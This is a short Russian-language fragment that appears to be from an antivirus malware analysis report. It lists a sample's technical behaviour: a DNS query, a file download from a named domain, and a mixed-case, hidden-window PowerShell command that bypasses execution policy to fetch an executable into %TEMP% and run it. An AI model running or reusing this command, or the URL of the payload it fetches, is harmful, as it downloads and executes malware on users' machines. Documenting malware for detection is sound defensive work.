Техническая информация
- http://felicitari360.ro/images/fresh/fada2.exe как %temp%\\fre.exe
- '<SYSTEM32>\cmd.exe' /C pOWERsHeLL.exE -wINdOwsTyLe HiDdEn -NOproFIlE -ExECUtioNpolicY ByPAss (NeW-OBJect SYstem.NeT.WeBCLiEnT).DOwnloADFIle('http://felicitari360.ro/images/fresh/fada2.exe','%TEMP%\\fre.exe') & %TE...
- DNS ASK fe####tari360.ro
- '<SYSTEM32>\cmd.exe' /C pOWERsHeLL.exE -wINdOwsTyLe HiDdEn -NOproFIlE -ExECUtioNpolicY ByPAss (NeW-OBJect SYstem.NeT.WeBCLiEnT).DOwnloADFIle('http://felicitari360.ro/images/fresh/fada2.exe','%TEMP%\\fre.exe') & %TE...' (со скрытым окном)